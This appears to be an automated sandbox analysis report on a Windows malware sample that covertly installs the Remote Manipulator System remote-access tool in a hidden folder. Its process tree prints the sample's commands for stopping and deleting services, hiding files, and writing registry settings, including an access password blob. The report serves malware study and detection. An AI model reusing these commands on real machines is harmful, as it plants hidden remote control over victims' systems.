Analysis
-
max time kernel
149s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
27-11-2022 15:20
Static task
static1
Behavioral task
behavioral1
Sample
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
Resource
win7-20220901-en
General
-
Target
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
-
Size
3.3MB
-
MD5
6627f3503fd971c24f274d670b9d6cd7
-
SHA1
b77b984497b6c3d1d695de6363b1b35d9a4c192e
-
SHA256
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e
-
SHA512
cf9210fa61eb5fec5d8d3bf2ea7e22c1f2d5f54c5f80b71c4146f73a4369a3ea0e5b7489750ff6ec00fee347398d023fb8580c1a4e134932cbd3ff555b9f380a
-
SSDEEP
98304:VgwRLgSX5ZcttvsdEv9eL4UezmlplRUSJLWpAh:VgOgSX/GW+1SezmXlRDRT
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
Processes:
data.exerutserv.exerutserv.exerutserv.exerutserv.exepid process 3852 data.exe 2860 rutserv.exe 4776 rutserv.exe 4916 rutserv.exe 4840 rutserv.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe -
Processes:
data.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\hide.exe autoit_exe -
Drops file in Windows directory 64 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File opened for modification C:\Windows\spom\JavaDeployReg.log cmd.exe File opened for modification C:\Windows\spom\tmpBC08.tmp cmd.exe File opened for modification C:\Windows\spom\wct611B.tmp cmd.exe File opened for modification C:\Windows\spom\WIJBFSKT-20221111-1347.log cmd.exe File created C:\Windows\spom\WIJBFSKT-20221111-1347a.log cmd.exe File created C:\Windows\spom\dd_vcredistMSI15DD.txt cmd.exe File created C:\Windows\spom\hide.exe cmd.exe File created C:\Windows\spom\jawshtml.html cmd.exe File opened for modification C:\Windows\spom\jusched.log cmd.exe File opened for modification C:\Windows\spom\nouac.cmd cmd.exe File created C:\Windows\spom\WIJBFSKT-20221111-1347.log cmd.exe File created C:\Windows\spom\rfusclient.exe cmd.exe File opened for modification C:\Windows\spom\BroadcastMsg_1668174376.txt cmd.exe File opened for modification C:\Windows\spom\hide.exe cmd.exe File opened for modification C:\Windows\spom\tmpBE88.tmp cmd.exe File created C:\Windows\spom\wct611B.tmp cmd.exe File created C:\Windows\spom\wct66BA.tmp cmd.exe File created C:\Windows\spom\wctB774.tmp cmd.exe File opened for modification C:\Windows\spom\aria-debug-1468.log cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI1607.txt cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134153107.html cmd.exe File created C:\Windows\spom\uac.cmd cmd.exe File created C:\Windows\spom\JavaDeployReg.log cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File opened for modification C:\Windows\spom\rutserv.exe cmd.exe File created C:\Windows\spom\tmpBE88.tmp cmd.exe File opened for modification C:\Windows\spom\uac.cmd cmd.exe File created C:\Windows\spom\data.exe cmd.exe File opened for modification C:\Windows\spom\dd_vcredistMSI1607.txt cmd.exe File created C:\Windows\spom\jusched.log cmd.exe File opened for modification C:\Windows\spom\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat cmd.exe File opened for modification C:\Windows\spom\wctB774.tmp cmd.exe File created C:\Windows\spom\wmsetup.log cmd.exe File opened for modification C:\Windows\spom\AdobeSFX.log cmd.exe File created C:\Windows\spom\chrome_installer.log cmd.exe File created C:\Windows\spom\dd_vcredistUI15DD.txt cmd.exe File created C:\Windows\spom\dd_vcredistUI1607.txt cmd.exe File opened for modification C:\Windows\spom\rfusclient.exe cmd.exe File created C:\Windows\spom\tmpBC08.tmp cmd.exe File opened for modification C:\Windows\spom\wct66BA.tmp cmd.exe File opened for modification C:\Windows\spom\chrome_installer.log cmd.exe File opened for modification C:\Windows\spom\data.exe cmd.exe File opened for modification C:\Windows\spom\dd_vcredistMSI15DD.txt cmd.exe File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134153107.html cmd.exe File created C:\Windows\spom\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat cmd.exe File created C:\Windows\spom\wct19BD.tmp cmd.exe File created C:\Windows\spom\dd_vcredistMSI1607.txt cmd.exe File created C:\Windows\spom\msedge_installer.log cmd.exe File created C:\Windows\spom\nouac.cmd cmd.exe File opened for modification C:\Windows\spom\wct805B.tmp cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI15DD.txt cmd.exe File created C:\Windows\spom\wct805B.tmp cmd.exe File opened for modification C:\Windows\spom\msedge_installer.log cmd.exe File opened for modification C:\Windows\spom\wctC330.tmp cmd.exe File opened for modification C:\Windows\spom\wmsetup.log cmd.exe File created C:\Windows\spom\aria-debug-1468.log cmd.exe File created C:\Windows\spom\BroadcastMsg_1668174376.txt cmd.exe File created C:\Windows\spom\wctC330.tmp cmd.exe File opened for modification C:\Windows\spom attrib.exe File created C:\Windows\spom\AdobeSFX.log cmd.exe File opened for modification C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File opened for modification C:\Windows\spom\wct19BD.tmp cmd.exe File opened for modification C:\Windows\spom\jawshtml.html cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 3096 sc.exe 3276 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 2860 rutserv.exe 2860 rutserv.exe 2860 rutserv.exe 2860 rutserv.exe 2860 rutserv.exe 2860 rutserv.exe 4776 rutserv.exe 4776 rutserv.exe 4916 rutserv.exe 4916 rutserv.exe 4840 rutserv.exe 4840 rutserv.exe 4840 rutserv.exe 4840 rutserv.exe 4840 rutserv.exe 4840 rutserv.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rutserv.exerutserv.exerutserv.exedescription pid process Token: SeDebugPrivilege 2860 rutserv.exe Token: SeDebugPrivilege 4916 rutserv.exe Token: SeTakeOwnershipPrivilege 4840 rutserv.exe Token: SeTcbPrivilege 4840 rutserv.exe Token: SeTcbPrivilege 4840 rutserv.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
data.exepid process 3852 data.exe 3852 data.exe 3852 data.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
data.exepid process 3852 data.exe 3852 data.exe 3852 data.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 2860 rutserv.exe 4776 rutserv.exe 4916 rutserv.exe 4840 rutserv.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exedata.execmd.exenet.exenet.exedescription pid process target process PID 2152 wrote to memory of 3852 2152 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 2152 wrote to memory of 3852 2152 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 2152 wrote to memory of 3852 2152 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 2152 wrote to memory of 3856 2152 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 2152 wrote to memory of 3856 2152 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 2152 wrote to memory of 3856 2152 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 3852 wrote to memory of 2620 3852 data.exe cmd.exe PID 3852 wrote to memory of 2620 3852 data.exe cmd.exe PID 3852 wrote to memory of 2620 3852 data.exe cmd.exe PID 2620 wrote to memory of 4316 2620 cmd.exe net.exe PID 2620 wrote to memory of 4316 2620 cmd.exe net.exe PID 2620 wrote to memory of 4316 2620 cmd.exe net.exe PID 4316 wrote to memory of 4528 4316 net.exe net1.exe PID 4316 wrote to memory of 4528 4316 net.exe net1.exe PID 4316 wrote to memory of 4528 4316 net.exe net1.exe PID 2620 wrote to memory of 2820 2620 cmd.exe net.exe PID 2620 wrote to memory of 2820 2620 cmd.exe net.exe PID 2620 wrote to memory of 2820 2620 cmd.exe net.exe PID 2820 wrote to memory of 2244 2820 net.exe net1.exe PID 2820 wrote to memory of 2244 2820 net.exe net1.exe PID 2820 wrote to memory of 2244 2820 net.exe net1.exe PID 2620 wrote to memory of 3096 2620 cmd.exe sc.exe PID 2620 wrote to memory of 3096 2620 cmd.exe sc.exe PID 2620 wrote to memory of 3096 2620 cmd.exe sc.exe PID 2620 wrote to memory of 3276 2620 cmd.exe sc.exe PID 2620 wrote to memory of 3276 2620 cmd.exe sc.exe PID 2620 wrote to memory of 3276 2620 cmd.exe sc.exe PID 2620 wrote to memory of 4724 2620 cmd.exe reg.exe PID 2620 wrote to memory of 4724 2620 cmd.exe reg.exe PID 2620 wrote to memory of 4724 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3488 2620 cmd.exe attrib.exe PID 2620 wrote to memory of 3488 2620 cmd.exe attrib.exe PID 2620 wrote to memory of 3488 2620 cmd.exe attrib.exe PID 2620 wrote to memory of 2860 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 2860 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 2860 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 4776 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 4776 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 4776 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 3532 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3532 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3532 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3224 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3224 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3224 2620 cmd.exe reg.exe PID 2620 wrote to memory of 2584 2620 cmd.exe reg.exe PID 2620 wrote to memory of 2584 2620 cmd.exe reg.exe PID 2620 wrote to memory of 2584 2620 cmd.exe reg.exe PID 2620 wrote to memory of 4884 2620 cmd.exe reg.exe PID 2620 wrote to memory of 4884 2620 cmd.exe reg.exe PID 2620 wrote to memory of 4884 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3804 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3804 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3804 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3728 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3728 2620 cmd.exe reg.exe PID 2620 wrote to memory of 3728 2620 cmd.exe reg.exe PID 2620 wrote to memory of 2444 2620 cmd.exe reg.exe PID 2620 wrote to memory of 2444 2620 cmd.exe reg.exe PID 2620 wrote to memory of 2444 2620 cmd.exe reg.exe PID 2620 wrote to memory of 4916 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 4916 2620 cmd.exe rutserv.exe PID 2620 wrote to memory of 4916 2620 cmd.exe rutserv.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\data.exe"C:\Users\Admin\AppData\Local\Temp\data.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nouac.cmd3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop netaservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice5⤵
-
C:\Windows\SysWOW64\net.exenet stop rmanservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice5⤵
-
C:\Windows\SysWOW64\sc.exesc delete netaservice4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"4⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /silentinstall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /firewall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e006600720061006e006b006400650062006f006500720040006d00610069006c002e0063006f006d003c002f0065006d00610069006c003e003c00690064003e007b00450043004500370036003700360031002d0034004500420039002d0034003000380046002d0041003000410043002d003300370042003600370042004100330045004100420044007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a004⤵
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /start4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
-
C:\Windows\spom\rutserv.exeC:\Windows\spom\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmdFilesize
300B
MD5a47e0180694389aee99b8e5593d5dced
SHA1925927658ea434258d2e26e8a8aa49a063376076
SHA256784e908ccad4e77d92be78cc2be0f502d29d0cf6e65331b56720cf0e5ad8b195
SHA5125d03369ccc1056b50609698d103c4f8694842a29329dccab7fd443af790c2575fd8a1877f78b58f136a428faa6375c51a74f56ab7eded219a58e7e4aef678c41
-
C:\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\hide.exeFilesize
819KB
MD572cc4ab6ee23c79bbeed4c4d7b31f741
SHA1a5598acb794ebbbad6c0819c20f6f7ed99541e89
SHA2565be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73
SHA5124840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5
-
C:\Users\Admin\AppData\Local\Temp\nouac.cmdFilesize
10KB
MD56786599aff4e8eb99164bdcbd3e7397b
SHA1be5daca8309b33310a59d253876ae49e4f26f3d7
SHA256ccc3c629937f5e26cf78de269feb5739cb2d859ab099312a8089afd98a1b2748
SHA5125925c7227cacf2a26a26a79e49b4b6aeacda862ef2fff7c879e679f5ee5e0fc87bf33cb0d8b5681b570977bf9d415dbfd2ec31c6fe4a03b90af47fe3a7e8e783
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Users\Admin\AppData\Local\Temp\uac.cmdFilesize
10KB
MD509bf5a799d46c218ee4d99b9083800ac
SHA105927f2aa870eefc12c2883600502e6ed2ff37e5
SHA2564cbdb4d4bad628128557ff0625f7ecc73801f5ed2324d731c1c70c70ea469e96
SHA512244a992bb21053ee9045df6f4d6f82d1119859d145c0867badbb1f4af1dd38bfd7105fb0584199098663a019b29db74b649279c946a75b48646707bedbdd4654
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
